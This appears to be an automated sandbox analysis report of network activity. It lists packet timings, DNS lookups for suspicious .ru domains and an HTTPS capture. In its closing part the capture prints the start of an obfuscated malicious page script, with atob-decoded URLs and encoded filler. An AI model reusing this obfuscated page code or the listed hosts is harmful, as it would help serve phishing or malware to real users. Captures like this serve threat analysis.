                  Feb 19, 2025 19:23:37.984972954 CET44355255104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:37.985265970 CET55255443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:37.985284090 CET44355255104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:37.986334085 CET44355255104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:37.986402035 CET55255443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:37.986846924 CET55255443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:37.986865044 CET55255443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:37.986929893 CET44355255104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:37.986943007 CET55255443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:37.986985922 CET55255443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:37.987328053 CET55260443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:37.987417936 CET44355260104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:37.987653017 CET55260443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:37.987901926 CET55260443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:37.987936020 CET44355260104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:38.469513893 CET44355260104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:38.469801903 CET55260443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:38.469867945 CET44355260104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:38.470334053 CET44355260104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:38.470637083 CET55260443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:38.470733881 CET44355260104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:38.525810957 CET55260443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:53.354064941 CET44355260104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:53.354127884 CET44355260104.21.43.76192.168.2.16
                  Feb 19, 2025 19:23:53.354190111 CET55260443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:54.166086912 CET55260443192.168.2.16104.21.43.76
                  Feb 19, 2025 19:23:54.166112900 CET44355260104.21.43.76192.168.2.16
                  Feb 19, 2025 19:24:08.686969995 CET55370443192.168.2.16142.250.184.228
                  Feb 19, 2025 19:24:08.687009096 CET44355370142.250.184.228192.168.2.16
                  Feb 19, 2025 19:24:08.687127113 CET55370443192.168.2.16142.250.184.228
                  Feb 19, 2025 19:24:08.687475920 CET55370443192.168.2.16142.250.184.228
                  Feb 19, 2025 19:24:08.687490940 CET44355370142.250.184.228192.168.2.16
                  Feb 19, 2025 19:24:09.319092989 CET44355370142.250.184.228192.168.2.16
                  Feb 19, 2025 19:24:09.319400072 CET55370443192.168.2.16142.250.184.228
                  Feb 19, 2025 19:24:09.319437027 CET44355370142.250.184.228192.168.2.16
                  Feb 19, 2025 19:24:09.319694996 CET44355370142.250.184.228192.168.2.16
                  Feb 19, 2025 19:24:09.319992065 CET55370443192.168.2.16142.250.184.228
                  Feb 19, 2025 19:24:09.320041895 CET44355370142.250.184.228192.168.2.16
                  Feb 19, 2025 19:24:09.370908022 CET55370443192.168.2.16142.250.184.228
                  Feb 19, 2025 19:24:19.223264933 CET44355370142.250.184.228192.168.2.16
                  Feb 19, 2025 19:24:19.223340034 CET44355370142.250.184.228192.168.2.16
                  Feb 19, 2025 19:24:19.223458052 CET55370443192.168.2.16142.250.184.228
                  Feb 19, 2025 19:24:20.160561085 CET55370443192.168.2.16142.250.184.228
                  Feb 19, 2025 19:24:20.160598040 CET44355370142.250.184.228192.168.2.16
                  Feb 19, 2025 19:25:08.740323067 CET55373443192.168.2.16142.250.184.228
                  Feb 19, 2025 19:25:08.740426064 CET44355373142.250.184.228192.168.2.16
                  Feb 19, 2025 19:25:08.740590096 CET55373443192.168.2.16142.250.184.228
                  Feb 19, 2025 19:25:08.740833998 CET55373443192.168.2.16142.250.184.228
                  Feb 19, 2025 19:25:08.740878105 CET44355373142.250.184.228192.168.2.16
                  Feb 19, 2025 19:25:09.386420965 CET44355373142.250.184.228192.168.2.16
                  Feb 19, 2025 19:25:09.426563025 CET55373443192.168.2.16142.250.184.228

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Feb 19, 2025 19:23:03.851923943 CET53538881.1.1.1192.168.2.16
                  Feb 19, 2025 19:23:03.886293888 CET53500841.1.1.1192.168.2.16
                  Feb 19, 2025 19:23:04.715493917 CET6172053192.168.2.161.1.1.1
                  Feb 19, 2025 19:23:04.715743065 CET6072453192.168.2.161.1.1.1
                  Feb 19, 2025 19:23:04.770319939 CET53617201.1.1.1192.168.2.16
                  Feb 19, 2025 19:23:04.789376020 CET53607241.1.1.1192.168.2.16
                  Feb 19, 2025 19:23:04.878767014 CET53618671.1.1.1192.168.2.16
                  Feb 19, 2025 19:23:07.603358984 CET5672753192.168.2.161.1.1.1
                  Feb 19, 2025 19:23:07.603415012 CET6442853192.168.2.161.1.1.1
                  Feb 19, 2025 19:23:07.611047029 CET53567271.1.1.1192.168.2.16
                  Feb 19, 2025 19:23:07.611061096 CET53644281.1.1.1192.168.2.16
                  Feb 19, 2025 19:23:08.424268007 CET53629121.1.1.1192.168.2.16
                  Feb 19, 2025 19:23:08.624846935 CET6121953192.168.2.161.1.1.1
                  Feb 19, 2025 19:23:08.624999046 CET5261253192.168.2.161.1.1.1
                  Feb 19, 2025 19:23:08.632503986 CET53526121.1.1.1192.168.2.16
                  Feb 19, 2025 19:23:08.632848024 CET53612191.1.1.1192.168.2.16
                  Feb 19, 2025 19:23:14.487840891 CET5677953192.168.2.161.1.1.1
                  Feb 19, 2025 19:23:14.487900972 CET5101653192.168.2.161.1.1.1
                  Feb 19, 2025 19:23:14.542604923 CET53567791.1.1.1192.168.2.16
                  Feb 19, 2025 19:23:14.611679077 CET53510161.1.1.1192.168.2.16
                  Feb 19, 2025 19:23:15.689106941 CET5847153192.168.2.161.1.1.1
                  Feb 19, 2025 19:23:15.689301968 CET5036953192.168.2.161.1.1.1
                  Feb 19, 2025 19:23:15.695533037 CET53525591.1.1.1192.168.2.16
                  Feb 19, 2025 19:23:15.704322100 CET53584711.1.1.1192.168.2.16
                  Feb 19, 2025 19:23:15.753242970 CET53503691.1.1.1192.168.2.16
                  Feb 19, 2025 19:23:21.939203978 CET53581791.1.1.1192.168.2.16
                  Feb 19, 2025 19:23:41.018357038 CET53554041.1.1.1192.168.2.16
                  Feb 19, 2025 19:23:59.468239069 CET138138192.168.2.16192.168.2.255
                  Feb 19, 2025 19:24:03.779656887 CET53628041.1.1.1192.168.2.16
                  Feb 19, 2025 19:24:03.921125889 CET53642301.1.1.1192.168.2.16
                  Feb 19, 2025 19:24:33.620498896 CET53644401.1.1.1192.168.2.16

                  ICMP Packets

                  TimestampSource IPDest IPChecksumCodeType
                  Feb 19, 2025 19:23:14.611764908 CET192.168.2.161.1.1.1c285(Port unreachable)Destination Unreachable
                  Feb 19, 2025 19:23:15.753313065 CET192.168.2.161.1.1.1c285(Port unreachable)Destination Unreachable

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Feb 19, 2025 19:23:04.715493917 CET192.168.2.161.1.1.10x1cf4Standard query (0)7pj1.chuseruc.ruA (IP address)IN (0x0001)false
                  Feb 19, 2025 19:23:04.715743065 CET192.168.2.161.1.1.10xa93dStandard query (0)7pj1.chuseruc.ru65IN (0x0001)false
                  Feb 19, 2025 19:23:07.603358984 CET192.168.2.161.1.1.10xfc61Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                  Feb 19, 2025 19:23:07.603415012 CET192.168.2.161.1.1.10x2fStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                  Feb 19, 2025 19:23:08.624846935 CET192.168.2.161.1.1.10xf7bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                  Feb 19, 2025 19:23:08.624999046 CET192.168.2.161.1.1.10x6eaaStandard query (0)www.google.com65IN (0x0001)false
                  Feb 19, 2025 19:23:14.487840891 CET192.168.2.161.1.1.10x739dStandard query (0)fel.oustiono.ruA (IP address)IN (0x0001)false
                  Feb 19, 2025 19:23:14.487900972 CET192.168.2.161.1.1.10xc4f7Standard query (0)fel.oustiono.ru65IN (0x0001)false
                  Feb 19, 2025 19:23:15.689106941 CET192.168.2.161.1.1.10x24e7Standard query (0)fel.oustiono.ruA (IP address)IN (0x0001)false
                  Feb 19, 2025 19:23:15.689301968 CET192.168.2.161.1.1.10xc89cStandard query (0)fel.oustiono.ru65IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Feb 19, 2025 19:23:04.770319939 CET1.1.1.1192.168.2.160x1cf4No error (0)7pj1.chuseruc.ru104.21.43.76A (IP address)IN (0x0001)false
                  Feb 19, 2025 19:23:04.770319939 CET1.1.1.1192.168.2.160x1cf4No error (0)7pj1.chuseruc.ru172.67.222.143A (IP address)IN (0x0001)false
                  Feb 19, 2025 19:23:04.789376020 CET1.1.1.1192.168.2.160xa93dNo error (0)7pj1.chuseruc.ru65IN (0x0001)false
                  Feb 19, 2025 19:23:07.611047029 CET1.1.1.1192.168.2.160xfc61No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                  Feb 19, 2025 19:23:08.632503986 CET1.1.1.1192.168.2.160x6eaaNo error (0)www.google.com65IN (0x0001)false
                  Feb 19, 2025 19:23:08.632848024 CET1.1.1.1192.168.2.160xf7bNo error (0)www.google.com142.250.184.228A (IP address)IN (0x0001)false
                  Feb 19, 2025 19:23:14.542604923 CET1.1.1.1192.168.2.160x739dNo error (0)fel.oustiono.ru172.67.178.176A (IP address)IN (0x0001)false
                  Feb 19, 2025 19:23:14.542604923 CET1.1.1.1192.168.2.160x739dNo error (0)fel.oustiono.ru104.21.31.170A (IP address)IN (0x0001)false
                  Feb 19, 2025 19:23:14.611679077 CET1.1.1.1192.168.2.160xc4f7No error (0)fel.oustiono.ru65IN (0x0001)false
                  Feb 19, 2025 19:23:15.704322100 CET1.1.1.1192.168.2.160x24e7No error (0)fel.oustiono.ru104.21.31.170A (IP address)IN (0x0001)false
                  Feb 19, 2025 19:23:15.704322100 CET1.1.1.1192.168.2.160x24e7No error (0)fel.oustiono.ru172.67.178.176A (IP address)IN (0x0001)false
                  Feb 19, 2025 19:23:15.753242970 CET1.1.1.1192.168.2.160xc89cNo error (0)fel.oustiono.ru65IN (0x0001)false

                  HTTP Request Dependency Graph

                  • 7pj1.chuseruc.ru
                  • https:
                    • fel.oustiono.ru
                  • a.nel.cloudflare.com

                  HTTPS Proxied Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.1649713104.21.43.764434896C:\Program Files\Google\Chrome\Application\chrome.exe
                  TimestampBytes transferredDirectionData
                  2025-02-19 18:23:05 UTC664OUTGET /Idsj/ HTTP/1.1
                  Host: 7pj1.chuseruc.ru
                  Connection: keep-alive
                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                  sec-ch-ua-mobile: ?0
                  sec-ch-ua-platform: "Windows"
                  Upgrade-Insecure-Requests: 1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Sec-Fetch-Site: none
                  Sec-Fetch-Mode: navigate
                  Sec-Fetch-User: ?1
                  Sec-Fetch-Dest: document
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US,en;q=0.9
                  2025-02-19 18:23:06 UTC1259INHTTP/1.1 200 OK
                  Date: Wed, 19 Feb 2025 18:23:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Cache-Control: no-cache, private
                  cf-cache-status: DYNAMIC
                  vary: accept-encoding
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zNazbZprjoI03%2FIlkAKy55BouF8rIg6UGazNHVEDGynQXGHCTqm6B0apxn%2FqBMHg%2BiilMVJ5hPI4BP%2BqKnbSn5QFCHWr5saL15sFze1lkxBAJ623M7vcfIyH4dM%2F9Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  alt-svc: h3=":443"; ma=86400
                  server-timing: cfL4;desc="?proto=TCP&rtt=4587&min_rtt=4402&rtt_var=140&sent=1095&recv=456&lost=0&retrans=1&sent_bytes=1219186&recv_bytes=53080&delivery_rate=11232055&cwnd=255&unsent_bytes=0&cid=1378f3aa70526d1f&ts=780968&x=0"
                  Set-Cookie: XSRF-TOKEN=eyJpdiI6ImR0Qk9QUi9La1FBbUFCNmxjMlhpS0E9PSIsInZhbHVlIjoiMlVGdmYwOGVrZlhCbXc2NDhyMFZlRW82Q2lFNC9PNStEYkxxVlJXTEhNb1Q1TThxM0o5OFJUWUhJSngzbWs4djlIcGJ5T2FOTS9kWXZIMTJwRitSZlNtYUFNTWkrS0JnTmpoNnR3UkdlUkNOenVjL09qdFI1MFgvUWd0aTJ5YUUiLCJtYWMiOiI5MmQ4ZGNmZjY0NzdlZWFkYTFhOWFmZjBmOGE5MTM5ZTdiNjNhOTY4MDcyNjcxNGU2ODAxMzhjNGU5ODg5N2JjIiwidGFnIjoiIn0%3D; expires=Wed, 19-Feb-2025 20:23:06 GMT; Max-Age=7200; path=/; secure; samesite=none
                  2025-02-19 18:23:06 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 52 61 64 47 35 6f 4e 46 42 6c 57 54 6c 50 4b 32 39 77 65 47 56 43 59 30 74 53 64 48 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4e 30 55 33 57 6d 46 57 63 47 70 42 61 56 41 78 4f 54 68 46 64 44 68 43 53 32 39 48 51 6b 31 71 57 45 52 77 59 6e 56 68 4e 54 4e 69 54 30 39 4c 4d 32 78 43 4f 54 46 32 51 6d 77 31 4d 57 6b 76 54 31 46 7a 54 47 78 5a 54 6c 4e 50 64 6c 4e 7a 61 45 56 77 52 6c 46 4b 65 46 52 30 64 6b 31 61 64 46 70 4d 62 7a 63 79 62 54 42 72 4b 32 6f 35 4f 58 70 76 5a 6e 52 35 54 55 56 6a 53 6a 4a 4c 63 45 64 6e 55 6d 46 5a 63 55 35 75 52 58 4e 47 65 44 64 49 55 6b 6c 4c 53 31 4e 54 55 33 56 79 4e 45 56 72 54 6c 4a 6a 64 55 77
                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImRadG5oNFBlWTlPK29weGVCY0tSdHc9PSIsInZhbHVlIjoiN0U3WmFWcGpBaVAxOThFdDhCS29HQk1qWERwYnVhNTNiT09LM2xCOTF2Qmw1MWkvT1FzTGxZTlNPdlNzaEVwRlFKeFR0dk1adFpMbzcybTBrK2o5OXpvZnR5TUVjSjJLcEdnUmFZcU5uRXNGeDdIUklLS1NTU3VyNEVrTlJjdUw
                  2025-02-19 18:23:06 UTC1369INData Raw: 37 66 66 61 0d 0a 3c 73 63 72 69 70 74 3e 0a 2f 2a 20 53 75 63 63 65 73 73 20 69 73 20 6e 6f 74 20 66 69 6e 61 6c 2c 20 66 61 69 6c 75 72 65 20 69 73 20 6e 6f 74 20 66 61 74 61 6c 3a 20 49 74 20 69 73 20 74 68 65 20 63 6f 75 72 61 67 65 20 74 6f 20 63 6f 6e 74 69 6e 75 65 20 74 68 61 74 20 63 6f 75 6e 74 73 2e 20 2a 2f 0a 51 4c 55 65 52 59 51 47 64 78 20 3d 20 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 38 32 59 7a 56 68 4c 6d 4e 6f 64 58 4e 6c 63 6e 56 6a 4c 6e 4a 31 4c 30 6c 6b 63 32 6f 76 22 29 3b 0a 6b 67 63 64 69 51 64 46 53 41 20 3d 20 61 74 6f 62 28 22 62 6d 39 74 59 58 52 6a 61 41 3d 3d 22 29 3b 0a 69 66 28 51 4c 55 65 52 59 51 47 64 78 20 3d 3d 20 6b 67 63 64 69 51 64 46 53 41 29 7b 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f
                  Data Ascii: 7ffa<script>/* Success is not final, failure is not fatal: It is the courage to continue that counts. */QLUeRYQGdx = atob("aHR0cHM6Ly82YzVhLmNodXNlcnVjLnJ1L0lkc2ov");kgcdiQdFSA = atob("bm9tYXRjaA==");if(QLUeRYQGdx == kgcdiQdFSA){document.write(deco
                  2025-02-19 18:23:06 UTC1369INData Raw: 52 76 64 7a 70 75 62 32 35 6c 4f 32 4a 76 65 43 31 7a 61 47 46 6b 62 33 63 36 62 6d 39 75 5a 54 74 79 5a 58 4e 70 65 6d 55 36 62 6d 39 75 5a 58 30 75 62 6d 38 74 63 32 56 73 5a 57 4e 30 61 57 39 75 65 79 31 33 5a 57 4a 72 61 58 51 74 64 47 39 31 59 32 67 74 59 32 46 73 62 47 39 31 64 44 70 75 62 32 35 6c 4f 79 31 33 5a 57 4a 72 61 58 51 74 64 58 4e 6c 63 69 31 7a 5a 57 78 6c 59 33 51 36 62 6d 39 75 5a 54 73 74 61 32 68 30 62 57 77 74 64 58 4e 6c 63 69 31 7a 5a 57 78 6c 59 33 51 36 62 6d 39 75 5a 54 73 74 62 57 39 36 4c 58 56 7a 5a 58 49 74 63 32 56 73 5a 57 4e 30 4f 6d 35 76 62 6d 55 37 4c 57 31 7a 4c 58 56 7a 5a 58 49 74 63 32 56 73 5a 57 4e 30 4f 6d 35 76 62 6d 55 37 64 58 4e 6c 63 69 31 7a 5a 57 78 6c 59 33 51 36 62 6d 39 75 5a 58 31 41 4c 58 64 6c 59
                  Data Ascii: Rvdzpub25lO2JveC1zaGFkb3c6bm9uZTtyZXNpemU6bm9uZX0ubm8tc2VsZWN0aW9uey13ZWJraXQtdG91Y2gtY2FsbG91dDpub25lOy13ZWJraXQtdXNlci1zZWxlY3Q6bm9uZTsta2h0bWwtdXNlci1zZWxlY3Q6bm9uZTstbW96LXVzZXItc2VsZWN0Om5vbmU7LW1zLXVzZXItc2VsZWN0Om5vbmU7dXNlci1zZWxlY3Q6bm9uZX1ALXdlY
                  2025-02-19 18:23:06 UTC1369INData Raw: 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f
                  Data Ascii: +oOOFpO++oOOFpOOFpOOFpO++oOOFpOOFpO++oO++oOOFpOOFpO++oOOFpO++oO++oOOFpO++oOOFpOOFpO++oO++oOOFpOOFpOOFpO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpO++oOOFpOOFpO
                  2025-02-19 18:23:06 UTC1369INData Raw: 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f
                  Data Ascii: oO++oO++oO++oO++oOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpOOFpO++oOOFpO++oO++oOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpO++oOOFpOO
                  2025-02-19 18:23:06 UTC1369INData Raw: 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46
                  Data Ascii: O++oOOFpOOFpO++oO++oO++oOOFpOOFpOOFpO++oOOFpO++oOOFpO++oOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpOOFpO++oO++oOOFpO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpO++oO++oOOFpO++oOOFpO++oO++oO++oO++oO++oOOFpO++oO++oO++oOOFpO++oO++oOOFpO++oO++oO++oO++oOOFpO++oO++oOOFpOOF
                  2025-02-19 18:23:06 UTC1369INData Raw: 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f
                  Data Ascii: ++oOOFpO++oO++oO++oOOFpO++oO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oOOFpOOFpO++oO++oO++oOOFpO++oO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpO++oOOFpO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oO++oOOFpOOFpOOFpO++oOOFpO++oO++oOOFpOOFpO++oO++oO++oOOFpO++oO++o
                  2025-02-19 18:23:06 UTC1369INData Raw: 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f
                  Data Ascii: +oO++oO++oOOFpO++oO++oO++oOOFpO++oO++oOOFpOOFpO++oOOFpO++oOOFpOOFpO++oOOFpOOFpO++oO++oOOFpO++oOOFpO++oOOFpOOFpOOFpOOFpO++oO++oOOFpO++oOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO
                  2025-02-19 18:23:06 UTC1369INData Raw: 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b
